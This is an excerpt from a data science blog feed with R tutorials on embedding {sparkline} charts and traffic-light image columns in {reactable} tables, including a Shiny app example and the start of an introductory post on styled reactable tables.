&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Server&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(shiny)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;sparkline_table &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderReactable&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; iris &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lower_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)[1],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; upper_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)[2],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bullet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; iris_table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; defaultColDef &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Sepal.Length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bullet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mean[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;upper_range[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;lower_range[[index]]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bullet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;titlePanel&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Sparkline!&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarLayout&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebarPanel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarPanel&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sliderInput&lt;/span&gt;(inputId &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;rows&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of rows:&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mainPanel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mainPanel&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactableOutput&lt;/span&gt;(outputId &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sparkline_table&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/images/app.png" alt="Shiny app with sparkline reactable table." &gt;&lt;/img&gt;&lt;/p&gt;
&lt;h2 id="dynamic-image-in-a-reactable-table"&gt;Dynamic Image in a Reactable Table&lt;/h2&gt;
&lt;p&gt;Another thing that you can do with {reactable} is dynamic image columns,
to show this I’ve created a traffic light visualisation with 3 levels:&lt;/p&gt;
&lt;p&gt;Level 1 (green):
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/images/1.svg" alt="Level 1 (green) traffic light." style="height:30px" &gt;&lt;/img&gt;&lt;/p&gt;
&lt;p&gt;Level 2 (Amber):
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/images/2.svg" alt="Level 2 (Amber) traffic light." style="height:30px" &gt;&lt;/img&gt;&lt;/p&gt;
&lt;p&gt;Level 3 (Red):
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/images/3.svg" alt="Level 3 (Red) traffic light." style="height:30px" &gt;&lt;/img&gt;&lt;/p&gt;
&lt;p&gt;For this example I’m only going to include the code required to create
the {reactable} table but following the steps above will work for a
shiny app as well, ensuring that the images are available to the app at
the path you pass to the table.&lt;/p&gt;
&lt;p&gt;The key here is to use a reactable column definition which is a
function. This function will take the value and create a html image tag
with the path to the correct svg file (png and jpeg will work the same).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tibble)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(htmltools)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(reactable)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; `Traffic Light` &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/blog/sparkline-reactable-shiny/images/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; defaultColDef &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(align &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;center&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(`Traffic Light` &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(path, value, &lt;span style="color:#a5d6ff"&gt;&amp;#34;.svg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;img&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; src, style &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;height: 40px;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tagList&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; style &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;display: inline-block; width: 60px&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe width="100%" height="300" src="https://www.jumpingrivers.com/misc/shiny-reactable/html_files/table.html" alt="reactable table displaying traffic light visualisation" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;In this blog we have looked at embedding sparkline reactable tables into
a shiny app and using another type of dynamic image inside a reactable
table. This brings me to the end of the series on {sparkline}, with a
notable cameo from {reactable} and a bit of {shiny} too. Stay tuned for
similar data science blogs.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sparklines in Reactable Tables</title><link>https://www.jumpingrivers.com/blog/sparkline-reactable/</link><pubDate>Thu, 13 Mar 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sparkline-reactable/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sparkline-reactable/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the second blog in a series about the {sparkline} R package for
inline data visualisations. You can read the first one
&lt;a href="https://www.jumpingrivers.com/blog/sparkline/" rel="external"&gt;here&lt;/a&gt;. In this post I
will be demonstrating how you can include sparklines inside HTML tables.&lt;/p&gt;
&lt;h2 id="reactable"&gt;Reactable&lt;/h2&gt;
&lt;p&gt;{reactable} is an R package for producing HTML tables, commonly used in
Shiny.&lt;/p&gt;
&lt;p&gt;To create a HTML &lt;a href="https://glin.github.io/reactable/" rel="external"&gt;reactable&lt;/a&gt; table
all we need to do is input a data.frame object to the &lt;code&gt;reactable&lt;/code&gt;
function. These tables have a nice simple default look however we can
also add our own styles very easily. In our first example of a table I
am just using the in built R &lt;code&gt;iris&lt;/code&gt; dataset.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(reactable)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(iris)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="510" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/reactable-table.html" alt="reactable table displaying iris data" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;A few things that can be easily added to reactable tables are filters,
sortable columns, searchable columns, default page size, borders and
striped &amp;amp; text wrapping. Along with these arguments we can of course
implement our own styling with CSS.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; iris,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; striped &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, searchable &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filterable &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, bordered &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; defaultPageSize &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="510" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/reactable-styled-table.html" alt="styled reactable table displaying iris data" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h2 id="sparklines-in-reactable-tables"&gt;Sparklines in Reactable Tables&lt;/h2&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-reactable-sparkline"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="box-line-and-bar-charts"&gt;Box, Line and Bar Charts&lt;/h3&gt;
&lt;p&gt;When it comes to embedding sparklines in reactable tables we need to add
a new column to our table, which we will then overwrite in the &lt;code&gt;columns&lt;/code&gt;
argument of &lt;code&gt;reactable&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In the first example I am using a mock dataset with 3 observations ‘x’,
‘y’ and ‘z’, each one is just a list containing 10 values generated by
&lt;code&gt;rnorm&lt;/code&gt;. Then I am using dplyr’s &lt;code&gt;mutate&lt;/code&gt; function to add a column full
of NA values.&lt;/p&gt;
&lt;p&gt;Now on the reactable side, I am again using the &lt;code&gt;reactable&lt;/code&gt; function,
where I use the &lt;code&gt;columns&lt;/code&gt; argument which takes a “Named list of column
definitions”. For each different sparkline I will need to use &lt;code&gt;colDef&lt;/code&gt;
to add a function which takes a value and index argument. I then use the
sparkline function and pass &lt;code&gt;data$values[[index]]&lt;/code&gt; along with the &lt;code&gt;type&lt;/code&gt;
to determine which chart I’d like. You can set a column preferences in
&lt;code&gt;colDef&lt;/code&gt;, I have used it here to hide the &lt;code&gt;values&lt;/code&gt; column.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sparkline)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;z&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
